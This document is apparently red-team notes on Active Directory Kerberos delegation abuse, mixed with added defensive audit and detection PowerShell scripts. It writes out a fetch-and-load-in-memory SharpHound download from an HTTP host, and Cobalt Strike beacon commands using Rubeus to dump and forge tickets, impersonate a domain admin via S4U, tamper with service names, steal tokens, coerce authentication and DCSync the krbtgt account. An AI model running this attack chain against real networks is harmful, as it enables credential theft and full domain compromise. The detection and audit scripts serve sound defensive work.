# Tips & Tricks

### PowerShell

Running a command in the background (the equivalent of appending `&` to a command on Linux):

```powershell
Start-Job {<COMMAND TO RUN>}
```

Killing the initial shell WILL kill the subprocess. Only use this command if you know that the initial shell will remain active.

### Command Prompt

Running a command in the background (the equivalent of appending `&` to a command on Linux):

```batch
START /B <COMMAND>
```

Killing the initial shell WILL kill the subprocess. Only use this command if you know that the initial shell will remain active.

## Downloading and Running an EXE in Memory

```powershell
# Fetch the assembly bytes over HTTP and load them into the current process without touching disk
$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.56.1/SharpHound.exe')
$assem = [System.Reflection.Assembly]::Load($data)
# Call the assembly's entry point with the arguments it would normally receive on the command line
[Sharphound.Program]::Main("-d north.sevenkingdoms.local -c all".Split())
```
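From the defender's side, the download-then-`Assembly.Load` sequence above normally leaves a trace in PowerShell script block logging (event 4104 in the `Microsoft-Windows-PowerShell/Operational` log). The script below is an added example, not code from the original page or from any tool it names: it checks that script block logging is enabled by policy and flags 4104 events whose script block both fetches bytes over HTTP and passes them to `Assembly.Load`. The indicator patterns and the embedded sample event are constructed for illustration; the live query at the end assumes the script runs on the host being checked.

```powershell
# Added detection example; not code from the original page or from any tool it names.
# Assumes a Windows host with PowerShell 5.1 or later. The indicator patterns and the
# sample 4104 event below are constructed for illustration.

# A script block that both fetches bytes over HTTP and hands them to Assembly.Load
# is the "download and run in memory" sequence shown above.
$FetchPattern = '\.DownloadData\(|\.DownloadString\(|Invoke-WebRequest|Invoke-RestMethod|\biwr\b'
$LoadPattern  = '\[(System\.)?Reflection\.Assembly\]::Load\('

function Test-ScriptBlockLoggingEnabled {
    # Policy value set by "Turn on PowerShell Script Block Logging"; without it, 4104
    # is only written for blocks PowerShell itself considers suspicious.
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    $v = Get-ItemProperty -Path $key -Name EnableScriptBlockLogging -ErrorAction SilentlyContinue
    return ($null -ne $v -and [int]$v.EnableScriptBlockLogging -eq 1)
}

function ConvertFrom-Event4104 {
    # Takes the XML of one 4104 event (Microsoft-Windows-PowerShell/Operational) and
    # returns a record when the logged script block matches both patterns.
    [CmdletBinding()]
    param([Parameter(ValueFromPipeline)][string]$Xml)
    process {
        $x = [xml]$Xml
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        $text = [string]$d.ScriptBlockText
        if ($text -match $FetchPattern -and $text -match $LoadPattern) {
            # An empty Path means the block was not loaded from a file on disk.
            $path = if ($d.Path) { $d.Path } else { '<no file on disk>' }
            [pscustomobject]@{
                Time          = $x.Event.System.TimeCreated.SystemTime
                ScriptBlockId = $d.ScriptBlockId
                Path          = $path
                Snippet       = $text.Substring(0, [Math]::Min(100, $text.Length))
            }
        }
    }
}

# Constructed sample event, shaped like a real 4104 record.
$SampleEvent = @'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4104</EventID><TimeCreated SystemTime="2024-01-01T10:00:00.000Z"/></System>
  <EventData>
    <Data Name="MessageNumber">1</Data>
    <Data Name="MessageTotal">1</Data>
    <Data Name="ScriptBlockText">$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.56.1/SharpHound.exe'); $assem = [System.Reflection.Assembly]::Load($data)</Data>
    <Data Name="ScriptBlockId">00000000-0000-4000-8000-000000000001</Data>
    <Data Name="Path"></Data>
  </EventData>
</Event>
'@

if (-not (Test-ScriptBlockLoggingEnabled)) {
    Write-Warning 'Script block logging is not enabled by policy; 4104 coverage will be incomplete.'
}

# Offline run over the constructed sample:
$SampleEvent | ConvertFrom-Event4104 | Format-List

# Live run on the host (uncomment):
# Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } |
#     ForEach-Object { $_.ToXml() } | ConvertFrom-Event4104 | Format-Table -AutoSize
```

Long script blocks are split across several 4104 events (`MessageNumber` of `MessageTotal`), so in production the fetch and the load may land in different records for the same `ScriptBlockId`; group by that id before matching if the blocks you see are large.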

Get a list of tickets:

```shell
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
```

Extract the ticket for the chosen logon session:

```shell
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x14794e /nowrap
```

Use the extracted ticket:

```shell
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFwj[...]MuSU8=
```

Jump into the process with that token:

```shell
beacon> steal_token 1540
```

You can also force Computer objects to authenticate with the service and steal their tickets. First, monitor for new tickets with Rubeus:

```shell
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe monitor /interval:10 /nowrap
```

Run SharpSpoolTrigger to force authentication:

```shell
beacon> execute-assembly C:\Tools\SharpSystemTriggers\SharpSpoolTrigger\bin\Release\SharpSpoolTrigger.exe dc-2.dev.cyberbotic.io web.dev.cyberbotic.io
```

DC-2 is the target and WEB is the listener.

Machine tickets can be used using the **S4U2Self Abuse** method.

## Constrained Delegation

This aims to restrict the services to which the server can act on behalf of a user. With these constraints the server can no longer cache TGTs of other users; instead, it is only allowed to obtain a TGS for another user, using its own TGT, for the listed services.

Finding computers with constrained delegation:

```shell
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=computer)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json
```

Finding users with constrained delegation:

```shell
beacon> execute-assembly C:\Tools\ADSearch\ADSearch\bin\Release\ADSearch.exe --search "(&(objectCategory=user)(msds-allowedtodelegateto=*))" --attributes dnshostname,samaccountname,msds-allowedtodelegateto --json
```

Constrained delegation can be configured on computer accounts as well as user accounts.
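The two ADSearch queries above are also the starting point of a defensive audit. The script below is an added example, not code from the original page, ADSearch or Rubeus; it assumes the RSAT ActiveDirectory module and an account that can read the domain. It lists every user and computer with `msDS-AllowedToDelegateTo` set, shows whether protocol transition (`TRUSTED_TO_AUTH_FOR_DELEGATION`) is enabled, collapses the allowed SPNs to the hosts they actually expose, and then reports the privileged accounts that can still be impersonated because they are neither marked "Account is sensitive and cannot be delegated" nor members of Protected Users.

```powershell
# Added audit script; not code from the original page, ADSearch or Rubeus.
# Assumes the RSAT ActiveDirectory module and an account that can read the domain.
Import-Module ActiveDirectory

# userAccountControl bits (Microsoft-documented values).
$TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition: S4U2Self works for any user
$NOT_DELEGATED                  = 0x100000   # "Account is sensitive and cannot be delegated"

function Get-ConstrainedDelegationReport {
    # Users and computers with at least one entry in msDS-AllowedToDelegateTo.
    $filter = '(&(|(objectCategory=computer)(objectCategory=user))(msDS-AllowedToDelegateTo=*))'
    $accounts = Get-ADObject -LDAPFilter $filter -Properties sAMAccountName, 'msDS-AllowedToDelegateTo', userAccountControl
    foreach ($acct in $accounts) {
        $uac  = [int]$acct.userAccountControl
        $spns = @($acct.'msDS-AllowedToDelegateTo')
        # Hosts named in the allowed SPNs. A ticket for one SPN is usable for every
        # service the same account runs on that host (see "Alternate Service Name"),
        # so the host list, not the SPN list, is the real scope of the delegation.
        $hosts = $spns | ForEach-Object { (($_ -split '/', 2)[1] -replace ':.*$', '') } | Sort-Object -Unique
        [pscustomobject]@{
            Account            = $acct.sAMAccountName
            ObjectClass        = $acct.ObjectClass
            ProtocolTransition = ($uac -band $TRUSTED_TO_AUTH_FOR_DELEGATION) -ne 0
            AllowedSPNs        = ($spns -join ', ')
            ReachableHosts     = ($hosts -join ', ')
        }
    }
}

function Get-DelegatableAdmins {
    # Members of Domain Admins that can still be impersonated through S4U2Self/S4U2Proxy:
    # neither flagged NOT_DELEGATED nor in Protected Users. Fix these first.
    $protected = @(Get-ADGroupMember -Identity 'Protected Users' -Recursive -ErrorAction SilentlyContinue |
                   ForEach-Object { $_.SID.Value })
    Get-ADGroupMember -Identity 'Domain Admins' -Recursive |
        Where-Object { $_.objectClass -eq 'user' } |
        Get-ADUser -Properties userAccountControl |
        Where-Object {
            (([int]$_.userAccountControl -band $NOT_DELEGATED) -eq 0) -and
            ($protected -notcontains $_.SID.Value)
        } |
        Select-Object SamAccountName, DistinguishedName
}

Get-ConstrainedDelegationReport | Format-Table -AutoSize
Get-DelegatableAdmins | Format-Table -AutoSize
```

Protocol transition is the setting to scrutinise: with it enabled, the delegating account can obtain S4U2Self tickets for any user without that user ever authenticating to it, which is the precondition for the `s4u` flow described in the rest of this section.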

First, we need the TGT of the account (user or computer) that is trusted for delegation. You can get this with the `dump` command of Rubeus.

```shell
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x3e4 /service:krbtgt /nowrap
```

If you have the NTLM or AES hash of the user, you can request the TGT using the `asktgt` command in Rubeus.

Next you can perform an S4U request to obtain a usable TGS for the allowed service.

```shell
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /user:sql-2$ /ticket:doIFLD[...snip...]MuSU8= /nowrap
```

* `/impersonateuser` is the user we want to impersonate; they should have local admin access on the target machine. nlamb is a domain admin, which is required for accessing the domain controller.
* `/msdsspn` is the service principal name that SQL-2 is allowed to delegate to.
* `/user` is the principal allowed to perform the delegation.
* `/ticket` is the TGT for `/user`.

The above will perform an S4U2Self and then an S4U2Proxy request to get the S4U2Proxy ticket needed.

Create a process we can steal:

```shell
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIGaD[...]ljLmlv
```

Steal the process:

```shell
beacon> steal_token 5540
```

## Alternate Service Name

From <https://www.secureauth.com/blog/kerberos-delegation-spns-and-more/>: When configuring Kerberos Constrained Delegation, keep in mind that you are delegating credentials not only to the service type you specified but also to the rest of the service types running under the same account. Also, the SPN specified in the sname field doesn't seem to be used as part of the authentication mechanism.

This can be mitigated by enabling [*Microsoft network server: Server SPN target name validation level: Required from client*](https://technet.microsoft.com/en-us/itpro/windows/keep-secure/microsoft-network-server-server-spn-target-name-validation-level).

However, the `sname` field of the ticket is not signed and can be tampered with, so you can change the `sname` of the ticket to another service name that is run by the same account as the original one and obtain access to that service.

You can abuse this with Rubeus:

```shell
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /msdsspn:cifs/dc-2.dev.cyberbotic.io /altservice:ldap /user:sql-2$ /ticket:doIFpD[...]MuSU8= /nowrap

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIGaD[...]ljLmlv

beacon> steal_token 2580
```

If you obtain an LDAP ticket for the DC, you can perform a DCSync attack:

```shell
beacon> dcsync dev.cyberbotic.io DEV\krbtgt
```

## S4U2Self Abuse

S4U2Self allows a service to obtain a TGS to itself on behalf of another user. S4U2Proxy allows a service to obtain a TGS on behalf of a user to another service.

If we have the TGT of a computer account, we can use S4U2Self to impersonate any user to the services run by that account.

```shell
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe s4u /impersonateuser:nlamb /self /altservice:cifs/dc-2.dev.cyberbotic.io /user:dc-2$ /ticket:doIFuj[...]lDLklP /nowrap
```

The `/self` flag is used to get a TGS on behalf of another user to itself.

You can then use that ticket to create a process as that user and use that to authenticate to other systems.

```shell
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFyD[...]MuaW8=

beacon> steal_token 2664
```
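On the domain controllers, the S4U2Proxy step of the constrained-delegation flow (the `s4u` command without `/self`) is visible in event 4769 (Kerberos service ticket requested): the `TransitedServices` field is `-` for an ordinary ticket request and names the delegating service account when the ticket was obtained through S4U2Proxy. The script below is an added detection example, not code from the original page or from Rubeus; it assumes "Audit Kerberos Service Ticket Operations" is enabled so that 4769 is written, and the watchlist and the sample event are constructed.

```powershell
# Added detection example; not code from the original page or from Rubeus.
# Assumes "Audit Kerberos Service Ticket Operations" is enabled on the domain controllers
# so that event 4769 is written. The watchlist and the sample event are constructed.
$Watchlist = @('nlamb', 'Administrator', 'krbtgt')

function ConvertFrom-Event4769 {
    # Parses the XML of one 4769 event. TransitedServices is "-" for an ordinary
    # service-ticket request and lists the intermediate service account(s) when the
    # ticket was obtained through S4U2Proxy, i.e. constrained delegation was exercised.
    [CmdletBinding()]
    param([Parameter(ValueFromPipeline)][string]$Xml)
    process {
        $x = [xml]$Xml
        $d = @{}
        foreach ($n in $x.Event.EventData.Data) { $d[$n.Name] = $n.'#text' }
        if (-not $d.TransitedServices -or $d.TransitedServices -eq '-') { return }
        $user = ($d.TargetUserName -replace '@.*$', '')
        [pscustomobject]@{
            Time          = $x.Event.System.TimeCreated.SystemTime
            Impersonated  = $user
            DelegatedBy   = $d.TransitedServices   # the account that performed S4U2Proxy
            TargetService = $d.ServiceName
            ClientIp      = $d.IpAddress
            Privileged    = ($Watchlist -contains $user)
        }
    }
}

# Constructed sample: sql-2$ obtained a ticket to DC-2 on behalf of nlamb,
# the shape the constrained-delegation s4u command above would produce.
$SampleEvent = @'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4769</EventID><TimeCreated SystemTime="2024-01-01T10:00:00.000Z"/></System>
  <EventData>
    <Data Name="TargetUserName">nlamb@DEV.CYBERBOTIC.IO</Data>
    <Data Name="TargetDomainName">DEV.CYBERBOTIC.IO</Data>
    <Data Name="ServiceName">DC-2$</Data>
    <Data Name="TicketOptions">0x40810000</Data>
    <Data Name="TicketEncryptionType">0x12</Data>
    <Data Name="IpAddress">::ffff:10.10.120.25</Data>
    <Data Name="Status">0x0</Data>
    <Data Name="TransitedServices">sql-2$@DEV.CYBERBOTIC.IO</Data>
  </EventData>
</Event>
'@

# Offline run over the constructed sample:
$SampleEvent | ConvertFrom-Event4769 | Format-List

# Live query on a domain controller, last 24 hours (uncomment):
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4769; StartTime = (Get-Date).AddDays(-1) } |
#     ForEach-Object { $_.ToXml() } | ConvertFrom-Event4769 |
#     Where-Object Privileged | Format-Table -AutoSize
```

A plain S4U2Self request (the `/self` flow in this section) involves no S4U2Proxy step, so `TransitedServices` stays `-` and this filter will not catch it; for that case the 4769 to look for is one where `ServiceName` is a machine account, `TargetUserName` is a privileged user, and the client IP is the machine itself rather than a host the user normally logs on from.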

